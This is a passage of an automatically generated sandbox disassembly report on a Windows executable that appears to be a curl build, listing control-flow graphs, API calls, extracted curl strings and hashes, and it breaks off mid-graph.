                                      • API String ID: 3583953570-1623358720
                                      • Opcode ID: ba2ea338faca8cddeaa40029e77d8c1ff43fcdf1dcf16e1c52ee47e46ddd4e88
                                      • Instruction ID: 01cbb96b3ca1926e2b02e903148c00f56921284c38914820df427321e845b96c
                                      • Opcode Fuzzy Hash: ba2ea338faca8cddeaa40029e77d8c1ff43fcdf1dcf16e1c52ee47e46ddd4e88
                                      • Instruction Fuzzy Hash: ABB1B032A0EB8285EB10EB61D44417DE7A5FF88B50F940135DA7E476D8DF3CE448A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1364 7ff7f8d07d2d-7ff7f8d07d3f _strdup 1365 7ff7f8d07d41-7ff7f8d07d59 call 7ff7f8d077b0 1364->1365 1366 7ff7f8d07d67-7ff7f8d07e02 1364->1366 1365->1366 1374 7ff7f8d0b264-7ff7f8d0b275 free 1365->1374 1371 7ff7f8d07e04-7ff7f8d07e0c 1366->1371 1372 7ff7f8d07e19-7ff7f8d07e24 1366->1372 1375 7ff7f8d07e26 1371->1375 1376 7ff7f8d07e0e-7ff7f8d07e17 1371->1376 1372->1375 1377 7ff7f8d07e2a-7ff7f8d07e32 1372->1377 1378 7ff7f8d0b277 call 7ff7f8d0dbbc 1374->1378 1379 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 1374->1379 1375->1377 1376->1372 1376->1375 1380 7ff7f8d0b219-7ff7f8d0b22a free 1377->1380 1381 7ff7f8d07e38-7ff7f8d0afa4 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 1377->1381 1378->1379 1386 7ff7f8d0b2bf-7ff7f8d0b2c1 1379->1386 1387 7ff7f8d0b2af-7ff7f8d0b2bd 1379->1387 1383 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 1380->1383 1384 7ff7f8d0b234-7ff7f8d0b262 1380->1384 1400 7ff7f8d0afaa-7ff7f8d0afac 1381->1400 1401 7ff7f8d0b03d-7ff7f8d0b03f 1381->1401 1383->1384 1384->1374 1392 7ff7f8d0b2c9 1386->1392 1393 7ff7f8d0b2c3-7ff7f8d0b2c7 1386->1393 1387->1386 1391 7ff7f8d0b2db 1387->1391 1392->1391 1393->1391 1393->1392 1402 7ff7f8d0b041-7ff7f8d0b048 1400->1402 1404 7ff7f8d0afb2-7ff7f8d0afb6 1400->1404 1401->1402 1403 7ff7f8d0b062-7ff7f8d0b066 1401->1403 1402->1403 1405 7ff7f8d0b04a-7ff7f8d0b05b 1402->1405 1406 7ff7f8d0b06c-7ff7f8d0b081 fclose 1403->1406 1404->1401 1407 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 1404->1407 1405->1403 1412 7ff7f8d0b05d _fileno 1405->1412 1413 7ff7f8d0b0a3-7ff7f8d0b0ac 1406->1413 1414 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 1406->1414 1407->1401 1422 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 1407->1422 1412->1403 1417 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 1413->1417 1418 7ff7f8d0b0ae-7ff7f8d0b0b2 free 1413->1418 1414->1413 1425 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 1417->1425 1426 7ff7f8d0b0f4-7ff7f8d0b101 1417->1426 1418->1417 1422->1401 1425->1426 1429 7ff7f8d0b117-7ff7f8d0b11b 1426->1429 1430 7ff7f8d0b103-7ff7f8d0b111 1426->1430 1431 7ff7f8d0b213 1429->1431 1432 7ff7f8d0b121-7ff7f8d0b12f 1429->1432 1430->1429 1430->1431 1431->1380 1432->1431 1433 7ff7f8d0b135-7ff7f8d0b20d 1432->1433 1433->1381 1433->1431
                                      APIs
                                      Strings
                                      • %s%s%s, xrefs: 00007FF7F8D0B00C
                                      • HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
                                      • curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
                                      • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
                                      • (%d) Failed writing body, xrefs: 00007FF7F8D0B08F
                                      • out of memory, xrefs: 00007FF7F8D07D45
                                      • 9J, xrefs: 00007FF7F8D0B09E
                                      • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
                                      • @), xrefs: 00007FF7F8D0B277
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$__acrt_iob_func_fileno_strdup$fputs
                                      • String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$out of memory$9J$@)
                                      • API String ID: 2510645739-1742031202
                                      • Opcode ID: e7aed5bf29db21c16b5f8518bc82aa38068e4691342c9d849a01dcaef7e55d92
                                      • Instruction ID: f2062cb3da8f33002533163c24001680ddcfd38906aec7d4341f37d4d5d03d50
                                      • Opcode Fuzzy Hash: e7aed5bf29db21c16b5f8518bc82aa38068e4691342c9d849a01dcaef7e55d92
                                      • Instruction Fuzzy Hash: ABA1B022A0EB8285FB10EB61D44417DE7A5FF88740F940035DA7E476D8DF3CE449A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1435 7ff7f8d07d8c-7ff7f8d07d9f 1437 7ff7f8d07da3-7ff7f8d07da9 1435->1437 1437->1437 1438 7ff7f8d07dab-7ff7f8d07db7 malloc 1437->1438 1439 7ff7f8d07dbd-7ff7f8d07ddd call 7ff7f8d0da94 1438->1439 1440 7ff7f8d0b3c6-7ff7f8d0b3c9 1438->1440 1441 7ff7f8d0b3cb-7ff7f8d0b3ce free 1439->1441 1444 7ff7f8d07de3-7ff7f8d07e02 1439->1444 1440->1441 1447 7ff7f8d07e04-7ff7f8d07e0c 1444->1447 1448 7ff7f8d07e19-7ff7f8d07e24 1444->1448 1449 7ff7f8d07e26 1447->1449 1450 7ff7f8d07e0e-7ff7f8d07e17 1447->1450 1448->1449 1451 7ff7f8d07e2a-7ff7f8d07e32 1448->1451 1449->1451 1450->1448 1450->1449 1452 7ff7f8d0b219-7ff7f8d0b22a free 1451->1452 1453 7ff7f8d07e38-7ff7f8d0afa4 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 1451->1453 1455 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 1452->1455 1456 7ff7f8d0b234-7ff7f8d0b275 free 1452->1456 1467 7ff7f8d0afaa-7ff7f8d0afac 1453->1467 1468 7ff7f8d0b03d-7ff7f8d0b03f 1453->1468 1455->1456 1471 7ff7f8d0b277 call 7ff7f8d0dbbc 1456->1471 1472 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 1456->1472 1469 7ff7f8d0b041-7ff7f8d0b048 1467->1469 1473 7ff7f8d0afb2-7ff7f8d0afb6 1467->1473 1468->1469 1470 7ff7f8d0b062-7ff7f8d0b081 fclose 1468->1470 1469->1470 1474 7ff7f8d0b04a-7ff7f8d0b05b 1469->1474 1488 7ff7f8d0b0a3-7ff7f8d0b0ac 1470->1488 1489 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 1470->1489 1471->1472 1476 7ff7f8d0b2bf-7ff7f8d0b2c1 1472->1476 1477 7ff7f8d0b2af-7ff7f8d0b2bd 1472->1477 1473->1468 1479 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 1473->1479 1474->1470 1487 7ff7f8d0b05d _fileno 1474->1487 1483 7ff7f8d0b2c9 1476->1483 1484 7ff7f8d0b2c3-7ff7f8d0b2c7 1476->1484 1477->1476 1482 7ff7f8d0b2db 1477->1482 1479->1468 1497 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 1479->1497 1483->1482 1484->1482 1484->1483 1487->1470 1492 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 1488->1492 1493 7ff7f8d0b0ae-7ff7f8d0b0b2 free 1488->1493 1489->1488 1500 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 1492->1500 1501 7ff7f8d0b0f4-7ff7f8d0b101 1492->1501 1493->1492 1497->1468 1500->1501 1504 7ff7f8d0b117-7ff7f8d0b11b 1501->1504 1505 7ff7f8d0b103-7ff7f8d0b111 1501->1505 1506 7ff7f8d0b213 1504->1506 1507 7ff7f8d0b121-7ff7f8d0b12f 1504->1507 1505->1504 1505->1506 1506->1452 1507->1506 1508 7ff7f8d0b135-7ff7f8d0b20d 1507->1508 1508->1453 1508->1506
                                      APIs
                                      Strings
                                      • %s%s%s, xrefs: 00007FF7F8D0B00C
                                      • HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
                                      • curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
                                      • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
                                      • (%d) Failed writing body, xrefs: 00007FF7F8D0B08F
                                      • 9J, xrefs: 00007FF7F8D0B09E
                                      • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
                                      • @), xrefs: 00007FF7F8D0B277
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func$_fileno_strdupmalloc
                                      • String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$9J$@)
                                      • API String ID: 3583953570-1623358720
                                      • Opcode ID: 3fbf2932f5f5a3209dac7f6ac3747fd6eb6271705fb56e57858a7746f1c2f977
                                      • Instruction ID: 4020d0760d05c64871759c46adb019fec2178f8803dd5593a13732d1b116ec29
                                      • Opcode Fuzzy Hash: 3fbf2932f5f5a3209dac7f6ac3747fd6eb6271705fb56e57858a7746f1c2f977
                                      • Instruction Fuzzy Hash: 5DB1B032A0EB8285EB10EB61D45017DE7A5FF88B50F940135DA7E476D8DF3CE448A7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2598 7ff7f8d2e068-7ff7f8d2e09d GetModuleHandleA 2599 7ff7f8d2e1f0-7ff7f8d2e20e 2598->2599 2600 7ff7f8d2e0a3-7ff7f8d2e0c9 GetProcAddress _mbspbrk 2598->2600 2601 7ff7f8d2e0cb-7ff7f8d2e0ce 2600->2601 2602 7ff7f8d2e0ec-7ff7f8d2e0ef 2600->2602 2605 7ff7f8d2e0e1-7ff7f8d2e0ea LoadLibraryA 2601->2605 2606 7ff7f8d2e0d0-7ff7f8d2e0df 2601->2606 2603 7ff7f8d2e0f1-7ff7f8d2e104 GetProcAddress 2602->2603 2604 7ff7f8d2e124-7ff7f8d2e133 GetSystemDirectoryA 2602->2604 2603->2604 2608 7ff7f8d2e106-7ff7f8d2e10f 2603->2608 2609 7ff7f8d2e139-7ff7f8d2e13d 2604->2609 2610 7ff7f8d2e1ed 2604->2610 2607 7ff7f8d2e11c-7ff7f8d2e11f 2605->2607 2613 7ff7f8d2e115-7ff7f8d2e11a LoadLibraryExA 2606->2613 2607->2610 2608->2613 2611 7ff7f8d2e140-7ff7f8d2e147 2609->2611 2610->2599 2611->2611 2615 7ff7f8d2e149-7ff7f8d2e16a malloc 2611->2615 2613->2607 2617 7ff7f8d2e1d8-7ff7f8d2e1eb free 2615->2617 2618 7ff7f8d2e16c-7ff7f8d2e17a GetSystemDirectoryA 2615->2618 2617->2610 2618->2617 2619 7ff7f8d2e17c 2618->2619 2620 7ff7f8d2e17f-7ff7f8d2e186 2619->2620 2620->2620 2622 7ff7f8d2e188-7ff7f8d2e18d 2620->2622 2623 7ff7f8d2e191-7ff7f8d2e198 2622->2623 2623->2623 2624 7ff7f8d2e19a-7ff7f8d2e1a0 2623->2624 2625 7ff7f8d2e1a3-7ff7f8d2e1af 2624->2625 2625->2625 2626 7ff7f8d2e1b1-7ff7f8d2e1b4 2625->2626 2627 7ff7f8d2e1cc-7ff7f8d2e1cf LoadLibraryA 2626->2627 2628 7ff7f8d2e1b6-7ff7f8d2e1ca 2626->2628 2629 7ff7f8d2e1d5 2627->2629 2628->2629 2629->2617
                                      APIs
                                      • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E091
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0AD
                                      • _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0C0
                                      • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0E4
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E0FB
                                      • LoadLibraryExA.KERNELBASE(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E11A
                                      • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E128
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E162
                                      • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E172
                                      • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E1CF
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D16509,?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D2E1EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrkfreemalloc
                                      • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                      • API String ID: 184734234-3327535076
                                      • Opcode ID: 238863f9c11f4d697a297311e24e5cdc573fe8f7ed692150ed0727168830531e
                                      • Instruction ID: c92b1a4142f4ca717167d01bb43a5c0e524b50ff8dffecf25479d2576e49ae88
                                      • Opcode Fuzzy Hash: 238863f9c11f4d697a297311e24e5cdc573fe8f7ed692150ed0727168830531e
                                      • Instruction Fuzzy Hash: 93417921A0D68685EB59EB22B814139E791BF9DFC0F8C4174CD2E073D1DE3CE409A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %ld$(nil)$(nil)$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-1379995092
                                      • Opcode ID: a63955e5a12cdd3e0126b501c1c72bbbb60ea4a13fa9e2048efdabacb0c32b14
                                      • Instruction ID: 912c487937dd46b35ab6e35fabdf67bb8589d09181616961706ee06af0f08eef
                                      • Opcode Fuzzy Hash: a63955e5a12cdd3e0126b501c1c72bbbb60ea4a13fa9e2048efdabacb0c32b14
                                      • Instruction Fuzzy Hash: 19524C26E1CA4242F7616F25A404379EA50BF88764FE44630DD7E177D9DE3CE80CA7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Connection timed out after %ld milliseconds$Hostname '%s' was found in DNS cache$In state %d with no easy_conn, bail out!$Operation timed out after %ld milliseconds with %I64d bytes received$Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received$Resolving timed out after %ld milliseconds$&s
                                      • API String ID: 0-2609473459
                                      • Opcode ID: 20ea6fa6f968dcaa173715c21156d3a3e88ed29723636ce97237f862197dfdd7
                                      • Instruction ID: c1525bd4293d6adf59c85d236b4bf413026ed1c5517920fa8747db7f382dd43d
                                      • Opcode Fuzzy Hash: 20ea6fa6f968dcaa173715c21156d3a3e88ed29723636ce97237f862197dfdd7
                                      • Instruction Fuzzy Hash: 9D421921B08A4245FB54EB7594102BDE793AF89BB4F854231CE3E177C5DE3DE409A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D23BB8: GetTickCount64.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,00007FF7F8D16245), ref: 00007FF7F8D23BC1
                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D29040
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: Count64Tickfflush
                                      • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d$Callback aborted
                                      • API String ID: 543934441-3594599953
                                      • Opcode ID: 1e27237f41beead48ce701369ae8707ef1765d4ffb82ba298e4e36d1f8a1ce51
                                      • Instruction ID: 1b9d9d9a9e73d195449c2c95e117f795ebd30135c60061be5a4424a1532a15ac
                                      • Opcode Fuzzy Hash: 1e27237f41beead48ce701369ae8707ef1765d4ffb82ba298e4e36d1f8a1ce51
                                      • Instruction Fuzzy Hash: 52024522B09B9985EB40EB29D9446F9F3A8FF48780F854232EE5D57791DF38D805D384
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLastmallocrecvsend
                                      • String ID: Send failure: %s
                                      • API String ID: 25851408-857917747
                                      • Opcode ID: e327cf3e2ad2a4187f8e9f2ff8b47702faa42ba3688412cbcffc64dc90a3d702
                                      • Instruction ID: 3c294fec3774d5a1bf4c5ca7bf9714c8957253da640b98ab39bbee45035b97ea
                                      • Opcode Fuzzy Hash: e327cf3e2ad2a4187f8e9f2ff8b47702faa42ba3688412cbcffc64dc90a3d702
                                      • Instruction Fuzzy Hash: CF415A32B09A4282EB20AF66B594369E7A0EF58BA4F484135CF6D437D0DF3CE448D354
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: 88ca84d53e1e42bfa1f557bf158eb17b77a14940c471f8631920d4f2befa50f2
                                      • Instruction ID: fd130911c07027e0a9c285550c7a8ed3438df7e48966b81c65a9fdcdba5d3ac4
                                      • Opcode Fuzzy Hash: 88ca84d53e1e42bfa1f557bf158eb17b77a14940c471f8631920d4f2befa50f2
                                      • Instruction Fuzzy Hash: 5951F922A08E8241FB65EB7594106BDE2A7BF5CBB4F880231DE7D476C4DE3CD4889394
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: d3a4e07e4c82b14e0a6a19c3fdcb85619191a5628faf5663cd4696f8ac2aaea8
                                      • Instruction ID: ba9349f0f787ecd69ef22fb3ba7dabd3429f0fad6a298f8077e902176d159761
                                      • Opcode Fuzzy Hash: d3a4e07e4c82b14e0a6a19c3fdcb85619191a5628faf5663cd4696f8ac2aaea8
                                      • Instruction Fuzzy Hash: 2CC04851F4E847C9E70837E258920B8C1A16F6C340FA814B2E02D016D28D5D209E3BBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 992 7ff7f8d0c0e4-7ff7f8d0c12b 993 7ff7f8d0c12d-7ff7f8d0c12f 992->993 994 7ff7f8d0c135-7ff7f8d0c147 call 7ff7f8d070b0 992->994 993->994 995 7ff7f8d0c226-7ff7f8d0c22f 993->995 994->995 1001 7ff7f8d0c14d 994->1001 998 7ff7f8d0c247-7ff7f8d0c251 fopen 995->998 999 7ff7f8d0c231-7ff7f8d0c23b 995->999 1000 7ff7f8d0c257-7ff7f8d0c25d 998->1000 999->998 1002 7ff7f8d0c23d-7ff7f8d0c245 __acrt_iob_func 999->1002 1003 7ff7f8d0c60a 1000->1003 1004 7ff7f8d0c263-7ff7f8d0c273 call 7ff7f8d0c63c 1000->1004 1005 7ff7f8d0c150-7ff7f8d0c156 1001->1005 1002->1000 1008 7ff7f8d0c60f-7ff7f8d0c63b call 7ff7f8d48290 1003->1008 1013 7ff7f8d0c279 1004->1013 1014 7ff7f8d0c5f2-7ff7f8d0c5fd __acrt_iob_func 1004->1014 1005->1005 1007 7ff7f8d0c158-7ff7f8d0c15e 1005->1007 1010 7ff7f8d0c21d-7ff7f8d0c220 free 1007->1010 1011 7ff7f8d0c164-7ff7f8d0c1a5 call 7ff7f8d0f868 fopen 1007->1011 1010->995 1020 7ff7f8d0c1a7-7ff7f8d0c1b0 fclose 1011->1020 1021 7ff7f8d0c1b2-7ff7f8d0c1c9 GetModuleFileNameA 1011->1021 1017 7ff7f8d0c27e-7ff7f8d0c28f 1013->1017 1014->1008 1018 7ff7f8d0c5ff-7ff7f8d0c608 fclose 1014->1018 1022 7ff7f8d0c291-7ff7f8d0c29c isspace 1017->1022 1023 7ff7f8d0c2a5-7ff7f8d0c2ac 1017->1023 1018->1008 1024 7ff7f8d0c218 1020->1024 1021->1010 1025 7ff7f8d0c1cb-7ff7f8d0c1e0 call 7ff7f8d49028 1021->1025 1022->1023 1026 